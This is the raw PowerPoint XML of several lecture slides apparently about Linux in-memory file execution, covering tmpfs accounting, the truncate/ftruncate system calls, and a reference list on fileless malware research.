            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmpfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-mount. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Furthermore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the backing-memory is accounted to the process that owns the file and is not subject to mount-quotas.</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90</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Property 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39822262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568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</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2"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>types.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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truncate(</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const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>path</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off_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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ftruncate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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,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off_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>length</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endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>truncate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftruncate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>die.net</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91</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9256198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948405" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>truncate()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and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ftruncate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> functions cause the regular file named by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or referenced by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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to be truncated to a size of precisely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If the file previously was larger than this size, the extra data is lost. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the file previously was shorter, it is extended, and the extended part reads as null bytes ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>').</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>die.net</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92</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153731823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With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ftruncate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the file must be open for writing; with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>truncate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the file must be writable.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Caution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>die.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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93</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375804645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a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="36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94</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>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16886334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814733" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware on Linux: Anatomy of an Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Guardian Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In-Memory-Only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ELF Execution (Without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmpfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux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ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> introduction AKA injecting into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for fun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Malware using new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ezuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>loader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Ofer Caspi and Fernando Martinez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>無檔案滲透執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ITW01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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95</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55922980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3" y="2492896"/>
            <a:ext cx="8640960" cy="4032448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>LOLBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and How Do Attackers Use Them in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Yiftach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Keshet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What are “/run/lock” and “/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” used for? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Detecting Linux </a:t>
            </a:r>
